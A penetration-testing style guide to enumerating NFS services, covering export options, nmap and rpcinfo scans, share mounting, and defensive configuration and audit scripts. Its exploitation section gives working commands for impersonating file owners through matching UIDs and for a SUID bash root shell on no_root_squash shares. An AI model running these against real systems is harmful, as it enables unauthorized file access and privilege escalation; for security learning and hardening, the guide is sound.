NFS Enumeration
Overview
Network File System (NFS) is a network file system developed by Sun Microsystems with the same purpose as SMB - to access file systems over a network as if they were local. However, it uses an entirely different protocol and is primarily used between Linux and Unix systems.
Key Characteristics:
Uses ONC-RPC/SUN-RPC protocol on TCP/UDP port 111
Main service runs on TCP/UDP port 2049
Uses External Data Representation (XDR) for system-independent data exchange
No built-in authentication mechanism (relies on RPC protocol options)
Authorization derived from file system information
NFS Versions
NFSv2
Older version supported by many systems, initially operated entirely over UDP
NFSv3
More features including variable file size and better error reporting, not fully compatible with NFSv2 clients
NFSv4
Includes Kerberos, works through firewalls, no longer requires portmappers, supports ACLs, state-based operations, performance improvements and high security. First stateful protocol version
NFSv4.1
Protocol support for cluster server deployments, scalable parallel access (pNFS extension), session trunking/NFS multipathing
NFSv4 Advantages:
Only uses one port (2049) - simplifies firewall configuration
Stateful protocol
Better security features
Kerberos authentication support
Default Configuration
NFS configuration is managed through the /etc/exports file, which contains a table of physical filesystems accessible by clients.
Example /etc/exports:
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)

NFS Configuration Options
Option            Description
rw                Read and write permissions
ro                Read only permissions
sync              Synchronous data transfer (slower but safer)
async             Asynchronous data transfer (faster but less safe)
secure            Requires requests to originate from client ports below 1024
insecure          Accepts requests from client ports above 1024
no_subtree_check  Disables subdirectory tree checking
root_squash       Maps root UID/GID 0 to anonymous, prevents root access
no_root_squash    All files created by root keep UID/GID 0
nohide            Exports mounted subdirectories with their own entries
Dangerous Settings
⚠️ High-Risk Configurations:
Option          Risk      Description
rw              High      Allows write access to shares
insecure        High      Allows ports above 1024 (non-root ports)
no_root_squash  Critical  Preserves root privileges - allows root access
nohide          Medium    Exports mounted subdirectories separately
Enumeration Techniques
1. Port Scanning
# Scan essential NFS ports
nmap -p111,2049 -sV -sC <target>
# Comprehensive NFS scan
nmap -p- --script 'nfs*' <target> -sV

2. RPC Information Gathering
# Get RPC service information
nmap -p111 --script rpcinfo <target>
# Alternative RPC enumeration
rpcinfo -p <target>

3. NFS-Specific Enumeration
# Discover NFS shares
showmount -e <target>
# Use Nmap NFS scripts
nmap --script nfs-ls,nfs-showmount,nfs-statfs <target> -p2049

4. NFS Share Mounting
# Create mount point
mkdir /mnt/nfs-share
# Mount NFS share
mount -t nfs <target>:/path/to/share /mnt/nfs-share -o nolock
# Alternative mounting options
mount -t nfs <target>:/path/to/share /mnt/nfs-share -o nolock,vers=3

5. Content Analysis
# List contents with permissions
ls -la /mnt/nfs-share/
# List with numeric UIDs/GIDs
ls -n /mnt/nfs-share/
# Check file ownership and permissions
stat /mnt/nfs-share/filename

Advanced Enumeration
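The content analysis step above looks at ownership and mode bits by hand. The following is an added example, not code from the original page or from any NFS project, that automates the same inspection of a mounted share from the defender's side: it reports set-UID/set-GID files (what a client with no_root_squash can leave behind), world-writable entries, and files whose numeric owner has no local account (the UID/GID mapping problem discussed later on this page). It uses only POSIX find and awk; the directory tree it builds for the demo is constructed, and the function names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original page): audit a directory tree, typically
# a mounted NFS share, for the conditions behind the UID-mapping and SUID issues
# described on this page. Uses only POSIX find; the demo tree below is constructed.

# Print one finding per line as KIND<TAB>PATH
audit_share_tree() {
    dir=$1
    # Set-UID/Set-GID files: what a no_root_squash client can leave behind
    find "$dir" -type f \( -perm -4000 -o -perm -2000 \) \
        -exec printf 'SETID\t%s\n' {} \;
    # World-writable files and directories: modifiable by any client that mounts the share
    find "$dir" \( -type f -o -type d \) -perm -0002 \
        -exec printf 'WORLD_WRITABLE\t%s\n' {} \;
    # Owners with no local account: over NFS only the numeric UID/GID is trusted,
    # so these are the files a client with a matching local UID would own
    find "$dir" \( -nouser -o -nogroup \) \
        -exec printf 'UNMAPPED_OWNER\t%s\n' {} \;
}

# Number of findings of one KIND, e.g. count_findings /mnt/nfs-share SETID
count_findings() {
    audit_share_tree "$1" | awk -F'\t' -v kind="$2" '$1 == kind { n++ } END { print n + 0 }'
}

# Constructed demo tree: one SUID file, one world-writable directory, one clean file
make_demo_tree() {
    d=$(mktemp -d)
    mkdir "$d/pub" && chmod 0777 "$d/pub"
    printf '#!/bin/sh\n' > "$d/rootbash" && chmod 4755 "$d/rootbash"
    printf 'ok\n' > "$d/notes.txt" && chmod 0644 "$d/notes.txt"
    printf '%s\n' "$d"
}

demo=$(make_demo_tree)
audit_share_tree "$demo"
rm -rf "$demo"
```

Run it against the mount point from step 4 (audit_share_tree /mnt/nfs-share) after mounting a share you administer; any SETID line on a share exported with no_root_squash deserves an immediate look, and UNMAPPED_OWNER lines show which files would be readable by a client that merely creates a user with the same numeric UID.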
Using Nmap NSE Scripts
# Comprehensive NFS enumeration
nmap --script nfs-ls,nfs-showmount,nfs-statfs -p2049 <target>
# NFS vulnerability scanning
nmap --script 'nfs*' -p2049 <target>

Manual RPC Enumeration
# Query RPC services
rpcinfo -p <target>
# Specific service queries
rpcinfo -u <target> nfs
rpcinfo -t <target> nfs

Security Issues and Attack Vectors
1. Authentication Bypass
Issue: NFS relies on UID/GID mapping without proper authentication
Impact: Access to files based on numeric user IDs
Exploitation: Create local users with matching UIDs
2. Privilege Escalation
Issue: no_root_squash configuration preserves root privileges
Impact: Root access to NFS shares
Exploitation: Upload SUID binaries, access sensitive files
3. Information Disclosure
Issue: World-readable shares or misconfigured permissions
Impact: Unauthorized access to sensitive data
Exploitation: Mount shares and browse contents
4. File System Manipulation
Issue: Write permissions on critical directories
Impact: Modify system files, plant backdoors
Exploitation: Upload malicious files, modify configurations
Exploitation Examples
UID/GID Manipulation
# Check file ownership
ls -n /mnt/nfs-share/
# Create local user with matching UID
useradd -u 1000 nfsuser
# Switch to created user
su nfsuser
# Access files with proper permissions
cat /mnt/nfs-share/sensitive-file.txt

SUID Binary Upload (when no_root_squash is set)
# Create SUID binary
cp /bin/bash /mnt/nfs-share/rootbash
chmod +s /mnt/nfs-share/rootbash
# Execute from target system
./rootbash -p

Enumeration Checklist
Initial Discovery
Share Analysis
Security Assessment
Defensive Measures
Secure Configuration
# Example secure exports entry
/secure/share 192.168.1.0/24(ro,sync,no_subtree_check,root_squash,secure)

Best Practices
Use root_squash: Always enable root squashing
Restrict networks: Limit access to specific subnets
Read-only when possible: Use ro for shares that don't need write access
Use secure option: Prevent use of high-numbered ports
Enable sync: Use synchronous writes for data integrity
Regular audits: Monitor NFS configurations and access logs
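The options table under Dangerous Settings and the best practices just listed can be checked mechanically. The script below is an added example, not code from the original page or from any NFS project: it reads /etc/exports text on stdin and prints one finding per line for every export that is open to any client, writable, exported with insecure, no_root_squash, nohide or async. It follows the exports(5) line form "path client(options) client(options)"; a client followed by a space and "(options)" is treated as two entries (the client with default options, and everyone with the given options), which is how exportfs reads it. The function names and the sample exports text at the end are this example's own.

```shell
#!/bin/sh
# Added example (not from the original page): audit /etc/exports text for the
# dangerous options discussed above. Reads exports text on stdin and prints one
# finding per line: SEVERITY PATH CLIENT REASON.
audit_exports() {
    awk '
    /^[ \t]*#/ || NF == 0 { next }               # skip comments and blank lines
    {
        path = $1
        for (i = 2; i <= NF; i++) {
            n = split($i, part, "(")             # "client(opt,opt)" -> client, "opt,opt)"
            host = part[1]
            opts = (n > 1) ? part[2] : ""
            sub(/\)$/, "", opts)
            if (host == "") host = "*"           # bare "(opts)" applies to everyone
            if (host == "*")
                print "HIGH", path, host, "export reachable from any client (restrict to a subnet)"
            if (opts ~ /(^|,)rw(,|$)/)
                print "HIGH", path, host, "rw: write access granted (use ro where possible)"
            if (opts ~ /(^|,)insecure(,|$)/)
                print "HIGH", path, host, "insecure: requests accepted from client ports above 1024"
            if (opts ~ /(^|,)no_root_squash(,|$)/)
                print "CRITICAL", path, host, "no_root_squash: client root keeps UID/GID 0 on the share"
            if (opts ~ /(^|,)nohide(,|$)/)
                print "MEDIUM", path, host, "nohide: nested mounts exposed through this export"
            if (opts ~ /(^|,)async(,|$)/)
                print "LOW", path, host, "async: writes acknowledged before reaching disk"
        }
    }'
}

# Convenience wrapper for a file: audit_exports_file /etc/exports
audit_exports_file() {
    audit_exports < "$1"
}

# Number of CRITICAL findings in exports text on stdin (usable as a CI gate)
critical_count() {
    audit_exports | grep -c '^CRITICAL'
}

# Demo on constructed exports content
printf '%s\n' \
    '# constructed sample' \
    '/srv/backup *(rw,no_root_squash,insecure)' \
    '/srv/homes 10.0.0.0/24(rw,sync,no_subtree_check)' \
    '/secure/share 192.168.1.0/24(ro,sync,no_subtree_check,root_squash,secure)' \
    | audit_exports
```

The secure exports entry from the previous section produces no findings, while the constructed /srv/backup line produces three HIGH findings and one CRITICAL; running audit_exports_file /etc/exports from a configuration check or cron job gives a cheap way to notice when someone adds no_root_squash or a wildcard client to a production server.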
Monitoring
# Check current NFS connections
netstat -an | grep :2049
# Monitor NFS statistics
nfsstat -s
# Check mounted shares
df -t nfs

Cleanup
# Unmount NFS share
umount /mnt/nfs-share
# Remove mount point
rmdir /mnt/nfs-share